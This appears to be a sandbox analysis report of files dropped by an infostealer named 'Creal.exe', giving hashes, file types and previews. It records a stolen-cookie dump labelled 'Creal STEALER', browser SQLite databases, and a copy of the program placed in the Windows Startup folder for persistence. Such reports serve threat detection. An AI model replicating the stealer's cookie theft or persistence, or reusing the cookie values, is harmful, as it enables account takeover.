                                                                                                                                                                                                                                                      Preview:Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum..Curabitur pretium tincidunt lacus. Nulla gravida orci a odio. Nullam varius, turpis et commodo pharetra, est eros bibendum elit, nec luctus magna felis sollicitudin mauris. Integer in mauris eu nibh euismod gravida. Duis ac tellus et risus vulputate vehicula. Donec lobortis risus a elit. Etiam tempor. Ut ullamcorper, ligula eu tempor congue, eros est euismod turpis, id tincidunt sapien risus a quam. Maecenas fermentum consequat mi. Donec fermentum. Pellentesque malesuada nulla a mi. Duis sapien sem, aliquet nec, commodo eget, consequat quis, neque.
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4
                                                                                                                                                                                                                                                      Entropy (8bit):1.5
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                      MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                      SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                      SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                      SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:pip.
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1107
                                                                                                                                                                                                                                                      Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                                                                                                                                                                      MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                                                                                                                                                                      SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                                                                                                                                                                      SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                                                                                                                                                                      SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2153
                                                                                                                                                                                                                                                      Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                                                                                                                                                                      MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                                                                                                                                                                      SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                                                                                                                                                                      SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
                                                                                                                                                                                                                                                      SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4557
                                                                                                                                                                                                                                                      Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                                                                                                                                                                      MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                                                                                                                                                                      SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                                                                                                                                                                      SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                                                                                                                                                                      SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):81
                                                                                                                                                                                                                                                      Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                                                      MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                                                      SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                                                      SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                                                      SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):104
                                                                                                                                                                                                                                                      Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                                                      MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                                                      SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                                                      SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                                                      SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1540368
                                                                                                                                                                                                                                                      Entropy (8bit):6.577233901213655
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24576:cmKZpHTv4iPI9FDgJNRs++l8GwLXSz4ih5Z5jWbsxuIl40OwumzuLxIhiE:0rJoDgJNRs+U8GwLXSMIZ5jWb0uIl48R
                                                                                                                                                                                                                                                      MD5:7E632F3263D5049B14F5EDC9E7B8D356
                                                                                                                                                                                                                                                      SHA1:92C5B5F96F1CBA82D73A8F013CBAF125CD0898B8
                                                                                                                                                                                                                                                      SHA-256:66771FBD64E2D3B8514DD0CD319A04CA86CE2926A70F7482DDEC64049E21BE38
                                                                                                                                                                                                                                                      SHA-512:CA1CC67D3EB63BCA3CE59EF34BECCE48042D7F93B807FFCD4155E4C4997DC8B39919AE52AB4E5897AE4DBCB47592C4086FAC690092CAA7AA8D3061FBA7FE04A2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):709904
                                                                                                                                                                                                                                                      Entropy (8bit):5.861739047785334
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:FYGdLI/X77mvfldCKGihH32W3cnPSqrUgLIe:FYGW7qNxr3cnPXLIe
                                                                                                                                                                                                                                                      MD5:0902D299A2A487A7B0C2D75862B13640
                                                                                                                                                                                                                                                      SHA1:04BCBD5A11861A03A0D323A8050A677C3A88BE13
                                                                                                                                                                                                                                                      SHA-256:2693C7EE4FBA55DC548F641C0CB94485D0E18596FFEF16541BD43A5104C28B20
                                                                                                                                                                                                                                                      SHA-512:8CBEF5A9F2D24DA1014F8F1CCBDDD997A084A0B04DD56BCB6AC38DDB636D05EF7E4EA7F67A085363AAD3F43D45413914E55BDEF14A662E80BE955E6DFC2FECA3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).B...f......P,..............................................<.....`.........................................P...X................................/..........p...T...........................0...@............`..h............................text....@.......B.................. ..`.rdata...?...`...@...F..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):304
                                                                                                                                                                                                                                                      Entropy (8bit):5.90790645354655
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:FO1g2D1Qv3rocHDKJlSMDuyXdt3RdVAkEhW/UPmTU4OvOrGISh+3rocHDyzxbW:CgC1Qv79mlDuyXv3RdJqmOvO65+79EM
                                                                                                                                                                                                                                                      MD5:16B117D739C5C713216C888646504566
                                                                                                                                                                                                                                                      SHA1:63577F666F43DC5960560C35D6E9978F612BE2C3
                                                                                                                                                                                                                                                      SHA-256:F1F819FA429E383A289E8226E1E25BEF457589FF61E84817371ED9D9658FA5DF
                                                                                                                                                                                                                                                      SHA-512:83C89FD6D78201D49EFBEBC0B6F0E3646C2246D0E082DB909C88252E3AA4FCC7304016514DB80D4B50339295689698D45C24F83E71F1D166CB62F4C399EBE37D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<--Creal STEALER BEST -->.....google.com.TRUE./.FALSE.2597573456.NID.511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg...google.com.TRUE./.FALSE.2597573456.1P_JAR.2023-10-05-06..
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                                      Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                                      MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                                      SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                                      SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                                      SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                      Entropy (8bit):0.8508558324143882
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                                                                                      MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                                                                                      SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                                                                                      SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                                                                                      SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                                      Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                                      MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                                      SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                                      SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                                      SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                      Entropy (8bit):0.8508558324143882
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                                                                                      MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                                                                                      SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                                                                                      SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                                                                                      SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16912015
                                                                                                                                                                                                                                                      Entropy (8bit):7.996822378035481
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:393216:29YiZM63hucsXMCHWUj/cuIbvR/PrK8Xms96YqZVo:29YiZt3hrsXMb8Ut/TKXlVo
                                                                                                                                                                                                                                                      MD5:017603B860F67F7F65F724E519465926
                                                                                                                                                                                                                                                      SHA1:51B1924EC73969FC16E00C0E80597C07711CF866
                                                                                                                                                                                                                                                      SHA-256:1BA7BEDAAA3A81350A78CF579E625E879D6D68CEF0F7AC8C55CC419798F380E1
                                                                                                                                                                                                                                                      SHA-512:A695347BEF5BDFDCD4ADEE43909B375828D89D48F78F88D443E4E19728FF82F2BFB5487EA80FBBBD9953394985BB0FDC935DA734EB32220FB386D701F9BC3945
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):7849062
                                                                                                                                                                                                                                                      Entropy (8bit):7.993164697244828
                                                                                                                                                                                                                                                      Encrypted:true
